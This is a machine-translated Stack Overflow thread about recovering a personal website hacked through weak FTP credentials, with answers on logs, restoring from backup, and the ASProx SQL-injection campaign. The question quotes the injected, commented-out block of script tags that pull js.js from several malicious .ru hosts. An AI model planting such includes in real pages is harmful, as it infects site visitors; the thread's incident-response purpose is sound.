Мой сайт был взломан..Что мне следует делать?[закрыто]
https://stackoverflow.com/questions/2970
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
RussianВопрос
Мой отец позвонил мне сегодня и сказал, что люди, заходящие на его сайт, получают 168 вирусов, пытающихся загрузить их на свои компьютеры.Он совсем не техничен и создал все это с помощью редактора WYSIWYG.
Я открыл его сайт и просмотрел исходный код, и там была строка Javascript includes в нижней части исходного кода прямо перед закрывающим HTML-тегом.Они включили этот файл (среди многих других).: http://www.98hs.ru/js.js <-- ОТКЛЮЧИТЕ JAVASCRIPT, ПРЕЖДЕ ЧЕМ ПЕРЕХОДИТЬ ПО ЭТОМУ URL.
Так что я пока прокомментировал это.Оказывается, его FTP-пароль представлял собой простое словарное слово длиной в шесть букв, поэтому мы думаем, что именно так его и взломали.Мы изменили его пароль на более чем 8-значную строку, состоящую из нескольких слов (он не стал бы использовать кодовую фразу, поскольку он набирает тексты hunt-n-peck).
Я сделал whois на 98hs.ru и обнаружил, что он размещен на сервере в Чили.На самом деле с этим тоже связан адрес электронной почты, но я серьезно сомневаюсь, что этот человек является виновником.Вероятно, просто какой-то другой сайт, который был взломан...
Я понятия не имею, что делать на данный момент, поскольку я никогда раньше не имел дела с подобными вещами.У кого-нибудь есть какие-нибудь предложения?
Он использовал незащищенный ftp plain jane через webhost4life.com.Я даже не вижу способа делай sftp на их сайте.Я думаю, что его имя пользователя и пароль были перехвачены?
Итак, чтобы сделать это более актуальным для сообщества, какие шаги вам следует предпринять / рекомендации, которым вы должны следовать, чтобы защитить ваш веб-сайт от взлома?
Для справки, вот строка кода, которая "волшебным образом" была добавлена в его файл (и ее нет в его файле на его компьютере - я оставил ее закомментированной, просто чтобы быть абсолютно уверенным, что она ничего не сделает на этой странице, хотя я уверен, что Джефф остерегся бы этого):
<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
Решение
Постарайтесь собрать как можно больше информации.Посмотрите, может ли хост предоставить вам журнал, показывающий все FTP-подключения, которые были сделаны к вашей учетной записи.Вы можете использовать их, чтобы узнать, использовалось ли вообще FTP-соединение для внесения изменений и, возможно, получения IP-адреса.
Если вы используете предварительно упакованное программное обеспечение, такое как Wordpress, Drupal или что-либо еще, что вы не кодировали, в коде загрузки могут быть уязвимости, которые допускают такого рода модификации.Если он создан на заказ, дважды проверьте все места, где вы разрешаете пользователям загружать файлы или изменять существующие файлы.
Во-вторых, можно было бы сделать дамп сайта как есть и проверить все на наличие других изменений.Возможно, это всего лишь одна внесенная ими модификация, но если они вошли по FTP, кто знает, что еще там есть.
Верните вашему сайту заведомо исправный статус и, при необходимости, обновите его до последней версии.
Существует определенный уровень доходности, который вы тоже должны принимать во внимание.Стоит ли пытаться выследить этого человека из-за ущерба или это что-то такое, где вы просто живете, учитесь и используете более надежные пароли?
Другие советы
Я знаю, что это немного запоздало, но URL-адрес, указанный для JavaScript, упоминается в списке сайтов, которые, как известно, были частью возрождения ботов ASPRox, которое началось в июне (по крайней мере, именно тогда мы были отмечены этим).Некоторые подробности об этом приведены ниже:
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
Неприятная вещь в этом заключается в том, что фактически каждое поле типа varchar в базе данных "заражено", чтобы выдавать ссылку на этот URL, в котором браузер получает крошечный iframe, который превращает его в бота.Базовое исправление SQL для этого можно найти здесь:
http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx
Самое страшное, однако, то, что вирус ищет значения для заражения в системных таблицах, и многие планы совместного хостинга также совместно используют пространство базы данных для своих клиентов.Так что, скорее всего, заражен был даже не сайт вашего отца, а чей-то другой сайт в его хостинговом кластере, который написал какой-то плохой код и открыл дверь для атаки SQL-инъекциями.
Если он еще не сделал этого, я бы отправил СРОЧНОЕ электронное письмо их хозяину и дал им ссылку на этот SQL-код для исправления всей системы.Вы можете исправить свои собственные затронутые таблицы базы данных, но, скорее всего, боты, которые занимаются заражением, снова пройдут прямо через эту дыру и заразят все остальные.
Надеюсь, это даст вам еще немного информации для работы.
Редактировать:Еще одна быстрая мысль: если он использует один из инструментов онлайн-дизайна хостинга для создания своего веб-сайта, весь этот контент, вероятно, находится в колонке и таким образом был заражен.
Вы упомянули, что ваш отец использовал инструмент для публикации веб-сайтов.
Если средство публикации выполняет публикацию со своего компьютера на сервер, возможно, его локальные файлы чисты и ему просто нужно переиздать их на сервер.
Однако он должен посмотреть, есть ли другой способ входа на его сервер, чем обычный FTP...это не очень безопасно, потому что он отправляет его пароль в виде открытого текста через Интернет.
Имея пароль из шести слов, он, возможно, был грубо взломан.Это более вероятно, чем перехват его ftp, но и это тоже может быть.
Начните с более надежного пароля.(8 символов - это все еще довольно слабо)
Посмотрите, есть ли эта ссылка на интернет блог по безопасности это полезно.
Является ли сайт простым статическим HTML-кодом?т. е.ему не удалось самостоятельно закодировать страницу загрузки, которая позволяет любому проезжающему мимо загружать скомпрометированные скрипты / страницы?
Почему бы не спросить webhost4life, есть ли у них какие-либо доступные журналы FTP, и не сообщить им о проблеме.Никогда не знаешь, может быть, они окажутся достаточно восприимчивыми и выяснят для вас, что именно произошло?
Я работаю на хостера с общим доступом, и мы всегда приветствуем подобные сообщения и обычно можем точно определить вектор атаки и сообщить, где клиент допустил ошибку.
Отключите веб-сервер, не выключая его, чтобы избежать сценариев завершения работы.Проанализируйте жесткий диск на другом компьютере в качестве накопителя данных и посмотрите, сможете ли вы определить виновника с помощью файлов журналов и тому подобного.Убедитесь, что код безопасен, а затем восстановите его из резервной копии.
Недавно это случилось с моим клиентом, который размещался на ipower.Я не уверен, была ли ваша среда хостинга основана на Apache, но если она была, обязательно дважды проверьте наличие файлов .htaccess, которые вы не создавали, особенно над webroot и внутри каталогов изображений, поскольку они, как правило, привносят туда какую-то гадость (они перенаправляли людей в зависимости от того, откуда они пришли в ссылке).Также проверьте все, что вы создали, на наличие кода, который вы не писали.
Очевидно, нас взломали одни и те же ребята!Или боты, в нашем случае.Они использовали SQL-инъекцию в URL-адресе на некоторых старых классических ASP-сайтах, которые больше никто не поддерживает.Мы нашли атакующие IP-адреса и заблокировали их в IIS.Теперь мы должны провести рефакторинг всего старого ASP.Итак, мой совет - сначала просмотреть журналы IIS, чтобы выяснить, не кроется ли проблема в коде вашего сайта или конфигурации сервера.
